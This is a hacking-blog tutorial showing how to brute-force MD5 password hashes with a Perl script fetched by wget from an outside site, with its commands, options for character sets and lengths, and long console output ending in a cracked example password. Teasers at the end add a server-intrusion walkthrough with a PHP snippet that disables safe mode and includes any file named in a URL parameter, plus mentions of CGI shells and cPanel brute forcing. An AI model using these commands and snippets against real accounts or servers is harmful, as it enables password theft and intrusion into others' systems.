Skip to main content

MD5 Hash Cracking With Perl . .


                                      ..::MD5 Hash Cracking With Perl::..


root@bt:~# Hi guys once again a simple but useful tutorial how to crack md5 hashes. If you have an password in md5 hash and you need password in plain text for this there is lot of tool'
> and online websites too but they wont crack all md5 hash if your hash exist in thier database they will give u plain text password but if not than u have to use some tool like 
> here we are using a perl script to crack an hash so i had encrypted an text "r2/." into a md5 hash which is "5d28a1f53e24a8b0a85d0a53348d49ad" so here we will try to decrypt it 

> again with perl in a plain text so first of all here we already know the leth of text is 4 and it is included with specail characters like ". /" etc so our job will be easy 
> but if we dont know the length and what kind of character included in hash then what? no problem we have some solution for that too ok lets began with first step if u are using linux here we are using back track for this first of all you need perl script so donalod and follow the steps to crack a hash i will try to explain each part of this script 


root@bt:~# wget http://bluerose.webuda.com/md5crack.rar


oot@bt:~# unrar x md5crack.rar


root@bt:~# perl md5crack.pl


root@bt:~# ok here is first option ./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72


root@bt:~# './md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72
our command will be like this > perl md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72
ad is charset if we will use ad option that means it will try only lowercase alphabets and all digits 0-9 now 1 is minimum lenth of hash character like a b c etc and 3 is maximum lenth of hash so this command will try all lowercase alpha numerical from 1 to 3 lenth so if password is like abc or ab9 tc it will show us result now lets see next command line 


root@bt:~# './md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72
see here aA charset if we will use this option than it will try 
lower,uppercase alpha numerical word like "Jeet123" and minimum length 3 and maximum is 3 it means it will try like this aaa,aab,aac ............aAc etc now lets move on last command line 




root@bt:~#'/md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72
here is charset is aAdx it will try lower,upperalpha numerical and specail charater ./*-+& etc. here minimum lenth is 1 and maximum is 10 to it will start from a to aaaaaaaaaa the first command will finish our tast fast but if hash included only lowercase alpha numerical word secound will try uppercase so it will took more than first command and thrid one will took more then first and second command so how to finish our job fast ok for cracking an hash i will say use more shell in one time like see normaly an pass length will be minimum 4 digits so we can start from 4 and maximum may be 10 or more so here what to do we can use 6 shell in one time for first command i will give u example here 
perl md5crack.pl 4 4 900150983cd24fb0d6963f7d28e17f72
perl md5crack.pl ad 4 4 <hash here> this command will try only 4 charcter lenght word so in second shell we can try 5 5 so that will try only 5 charcter lengh word 
perl md5crack.pl ad 5 5 <hash here> like this we can use 6 6, 7 7, 8 8 , etc so minimum and maximum length will be same so task will be finish fast and it depend on charset what kind of charset you are trying like ad,aA or aAdx now as i told here i have an example to make understand>>> text= "r2/." and encrypted  md5 hash  is "5d28a1f53e24a8b0a85d0a53348d49ad" we will try to crack it again in plain text here we will try command line >  perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad


root@bt:~# perl md5crack.pl aAdx 4 4 5d28a1f53e24a8b0a85d0a53348d49ad
5d28a1f53e24a8b0a85d0a53348d49ad != da0df02b98b2c3b9cbbdf43587d56018 (uLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != d1c001e8867850b3c1433ba0ac938103 (vLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 0d75ced017fb9b8780d6c30f8e36a86b (wLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != c6c1115d33975689dfa7433422a5288b (xLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != ea5d6366e66c39611509b9e36d9853fa (yLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 9545a19052b086dd4615509cf861d062 (zLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 5f037f8a2e8160cf740ac02d559bb0fe (ALfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b266bec7dfe619f023b93b8ca87fa762 (BLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 3601c4c04c4355c16e5bb388df65800c (CLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != dd4f0c6b20d288aacc0db568c26b19ae (DLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b432ea04463991af047b6c4a1a9bdbbc (ELfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 07d179f416bcfd993a0c9beafd479e70 (FLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 663e4f51eb5c016df23ad06b4e7e766b (GLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f1289bb711ed7327da215cc9405efd2d (HLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f3c865b0b727f8047781c2fd38f30e6f (ILfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f0a6fde524f2b7dd5cda8d45d6c41bd6 (JLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != ed40b98eb7d1351d53c5d777f876839c (KLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 3495e83370012d26050dbcdc95c42015 (LLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != c8b68f5c9365fcafa5884edaa98801b6 (MLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != e86bf9d6265191b8c63c3c963e6c9a92 (NLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 0cf5d8630ebb9cabc8db92cbbdb1d5c8 (OLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 2383f4b6f1117600e880127fb2641fcd (PLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 07f00734587164f59d4412ac4b170415 (QLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 1652ddeb95d31881ccb73b589f35563a (RLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != abbc084e67b158e646c0e1a203099067 (SLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 7dd1d31cf7e1c9030ad3b3e03811fcad (TLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != be5173f471c44ca32a44ad5d03b456be (ULfa)
5d28a1f53e24a8b0a85d0a53348d49ad != c5a73d7da1f995c5fff1429454ff8a46 (VLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 38caf84bd285eb5d2c5cb4e08ef730d0 (WLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != df71a25b9ad6f9bf01a559635b733083 (XLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 553117796a60d745d5c19107943f5abf (YLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b1dd21008ac5cc4a8c9cb03f02fded59 (ZLfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 89dbf10c22720fdd47411736da8a86d0 (1Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != b7f20e899623426ffd38d99218a215f2 (2Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != de271d671eaf1db39b9e8202654f610d (3Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 197359723ff9ccabe9e13d22ef616412 (4Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != fb62f20a2c81e65623cf400575e1850a (5Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != bdc2a4179810b0e37ea31239901d06c4 (6Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != e4565547c49e868cddf1ba49c85dbd5e (7Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != f70651b42b4997c9a8c42a7ddd7b7e73 (8Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != 63e13a11b755c2bd7dc25817ba1ccb1b (9Lfa)
5d28a1f53e24a8b0a85d0a53348d49ad != e7c331e7937 snip...................


process here started how it is trying every thing we can see now when it will finish it will give us correct result se below 



5d28a1f53e24a8b0a85d0a53348d49ad != bd25e63fa49684f2b4e862670485048d ("1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 62875e810adc53487939aa311c770695 ($1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 677ab68f4a1cad69c494c891e2f06aa6 (%1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != c0397120d1b845287c1163a2ef4ea645 (&1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 47cedcd4aa4f17d6eb4d1fc764b24289 (/1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != f2226fade37e452c3337b4d486845258 ((1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != d335549958cb6f7bc30d9bceb0182599 ()1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 36ba42a32c7171b7a671cfa1e6089854 (=1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != c1c57fdc741385631385fd005bf06700 (?1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 0609508323bf700b1606c6b72169b7d8 (-1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != fc1e4aff82e6109d8471acb0279c00e3 (.1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 925a4422871639620285fc1a521424ea (:1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != e35df166288f8b675a38e4c9e39915dd (\1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 4991a349aee2145b4270211cb9155982 (*1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 06095b2620890747f1f1eec52c87daa0 ('1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 0609508323bf700b1606c6b72169b7d8 (-1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 68d126b1f8710d323ebbd88c9077726d (_1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 925a4422871639620285fc1a521424ea (:1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != fc1e4aff82e6109d8471acb0279c00e3 (.1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 33535a71dd3f6ce518ff4439c9086942 (;1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != a11ec1f07e10d299426cf6b3d77b3514 (,1/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 807fed161fa993f41f5e73e06db002d3 (a2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 8962a9a33e0973e23cb82fbb2c00fe8c (b2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 4e9da6ec31a0fe9507795827db605dac (c2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 788ae10879ca928d00cd5079b6631d10 (d2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != ad6408b9ad9f5bde36548b720a42733f (e2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 527b287eeacc38f7aa9cdd07ad605871 (f2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 825a9fe2400e410c668e38bbd7e5da43 (g2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 860f12af83973aa8d4f85108e3dbcc4a (h2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 859d2caa4780f37f725acbb7e2f2c984 (i2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 8753b399d39090b695040ebfb39037d4 (j2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != bfcb8d3eaca7f9b7571112a40802d477 (k2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 7348e7b0caf781e4a6b9221ecb9694a4 (l2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != a3d691f375ea2b2766644c9171dde234 (m2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 607db55f1ba78e363ae8bb1921478c3a (n2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != ec58f0995b89d9777fc21fd15890cfdb (o2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != d66d37eef3815a28d83e854249f6c734 (p2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 842d107a1c737608dcb1b12f1f2729dc (q2/.)
5d28a1f53e24a8b0a85d0a53348d49ad != 5d28a1f53e24a8b0a85d0a53348d49ad (r2/.)


**** Password Cracked! => r2/.
root@bt:~#  we got the plain text i hope it will helps if you are not using linux but want to try it on windows i will write an short tut how to use perl on windows or any Question feel free to ask 


Note: use perl md5crac.pl instead of ./md5crack.pl 
correct command will look like this >>>>>>>>>>>perl md5crack.pl ad 5 5 <hash>
if u will try this it will ask for permission >>>>>>>./md5crack.pl ad 55 <hash> wil not work untill u wont change permission of the script

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h...

|Bypass Symlink on 2013 Server With Different .htaccess and Methods by Sen Haxor |

Hi, Guys,  Please a wonderfull tutorial provided bt Sem;\  Today I gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods. So let's Get Started :) Note: This method is not applicable for Godaddy, Bluehost, Hostgator and Hostmonstor Servers. For This First You Need the Following Files : 1 -> Sen Haxor CGI Shell 2 -> sen.zip 3 -> passwd-bypass.php 4 -> Turbo Brute force Cpanel 5 - > Port.py First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server . Use the Following Code : Make a php.ini with the following code safe_mode=Off And ini.php with <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo...

How to Hack WhatsApp using just a GIF

A picture is worth a thousand words, but a GIF is worth a thousand pictures. Today, the short looping clips, GIFs are everywhere—on your social media, on your message boards, on your chats, helping users perfectly express their emotions, making people laugh, and reliving a highlight. But what if an innocent-looking GIF greeting with Good morning, Happy Birthday, or Merry Christmas message hacks your smartphone? Well, not a theoretical idea anymore. WhatsApp has recently patched a critical security vulnerability in its app for Android, which remained unpatched for at least 3 months after being discovered, and if exploited, could have allowed remote hackers to compromise Android devices and potentially steal files and chat messages. WhatsApp Remote Code Execution Vulnerability The vulnerability, tracked as  CVE-2019-11932 , is a double-free memory corruption bug that doesn't actually reside in the WhatsApp code itself, but in an open-source GIF image parsing library that What...